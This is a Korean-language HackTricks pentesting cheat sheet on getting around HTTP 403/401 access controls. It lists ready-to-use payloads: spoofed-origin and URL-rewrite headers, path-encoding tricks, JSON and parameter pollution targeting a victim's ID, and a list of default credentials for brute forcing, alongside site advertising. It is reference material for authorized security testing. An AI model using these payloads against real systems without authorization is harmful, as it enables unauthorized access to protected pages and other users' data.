403 & 401 Bypasses

htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔톡하세요.
HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

취약점 평가 및 침투 테스트를 위한 즉시 사용 가능한 설정. 20개 이상의 도구 및 기능으로 어디서든 전체 펜테스트를 실행하고 보고서 작성까지 가능합니다. 우리는 펜테스터를 대체하지 않습니다 - 우리는 커스텀 도구, 탐지 및 익스플로잇 모듈을 개발하여 그들에게 깊이 파고들고 쉘을 열고 즐길 시간을 돌려줍니다.

{% embed url="https://pentest-tools.com/" %}

HTTP 동사/메소드 퍼징

파일에 액세스하기 위해 다른 동사를 사용해보세요: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

응답 헤더를 확인하고 어떤 정보가 제공되는지 확인하세요. 예를 들어, Content-Length: 55와 함께 HEAD에 대한 200 응답은 HEAD 동사가 정보에 액세스할 수 있다는 것을 의미합니다. 그러나 여전히 해당 정보를 유출하는 방법을 찾아야 합니다.
X-HTTP-Method-Override: PUT와 같은 HTTP 헤더를 사용하여 사용된 동사를 덮어쓸 수 있습니다.
TRACE 동사를 사용하고 매우 운이 좋다면 응답에서 중간 프록시가 추가한 헤더도 볼 수 있어 유용할 수 있습니다.

HTTP 헤더 퍼징

Host 헤더를 임의의 값으로 변경해보세요 (여기서 작동한 것)
리소스에 액세스하기 위해 다른 사용자 에이전트를 사용해보세요.
HTTP 헤더 퍼징: HTTP 프록시 헤더, HTTP 인증 기본 및 NTLM 브루트포스 (몇 가지 조합만) 및 기타 기술을 시도해보세요. 이 모든 것을 수행하기 위해 fuzzhttpbypass 도구를 만들었습니다.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP-T: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost

경로가 보호되어 있다면 다음 헤더를 사용하여 경로 보호를 우회해 볼 수 있습니다:

X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
페이지가 프록시 뒤에 있는 경우, 개인 정보에 액세스하는 것을 방지하는 것이 프록시일 수도 있습니다. HTTP 요청 스머글링을 남용하거나 hop-by-hop 헤더를 시도해보세요.
다른 응답을 찾기 위해 특수 HTTP 헤더를 퍼징하세요.
HTTP 메소드를 퍼징하는 동안 특수 HTTP 헤더를 퍼징하세요.
Host 헤더를 제거하면 보호를 우회할 수도 있습니다.

경로 퍼징

_/path_가 차단된 경우:

/**%2e/path_를 사용해보세요 (액세스가 프록시에 의해 차단된 경우, 이를 통해 보호를 우회할 수 있습니다). 또한 /%252e/path (이중 URL 인코딩)도 시도해보세요
유니코드 우회 시도: /%ef%bc%8fpath (URL 인코딩된 문자는 "/")이므로 인코딩을 다시 하면 _//path_가 되어 이미 /path 이름 확인을 우회했을 수도 있습니다
다른 경로 우회:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (루비)
다음 상황에서 이 목록을 모두 사용하세요:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
다른 API 우회:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

매개변수 조작

**id=123 --> id=124**로 param value 변경
URL에 추가 매개변수 추가: ?id=124 —-> id=124&isAdmin=true
매개변수 제거
매개변수 재정렬
특수 문자 사용
매개변수에서 경계 테스트 수행 — -234 또는 0 또는 _99999999_와 같은 값 제공

프로토콜 버전

HTTP/1.1을 사용하는 경우 1.0 사용 또는 2.0을 지원하는지 테스트

기타 우회 방법

도메인의 IP 또는 CNAME 가져와 직접 연락 시도
일반적인 GET 요청을 보내 서버 스트레스 테스트 시도 (이 사람에게 Facebook에서 작동했습니다).
프로토콜 변경: http에서 https로 또는 https에서 http로
https://archive.org/web/에 가서 해당 파일이 과거에 전 세계적으로 접근 가능했는지 확인

무차별 대입

비밀번호 추측: 다음과 같은 일반 자격 증명 테스트. 피해자에 대해 알고 있는 정보가 있나요? 또는 CTF 챌린지 이름이 있나요?
무차별 대입: 기본, 다이제스트 및 NTLM 인증 시도

{% code title="일반 자격 증명" %}

admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

{% endcode %}

자동 도구

취약점 평가 및 침투 테스트를 위한 즉시 사용 가능한 설정. 20개 이상의 도구 및 기능을 사용하여 어디서든 전체 펜테스트를 실행합니다. 우리는 펜테스터를 대체하지 않습니다 - 깊이 파고들고, 쉘을 열고, 즐거움을 느낄 수 있도록 사용자 정의 도구, 탐지 및 공격 모듈을 개발합니다.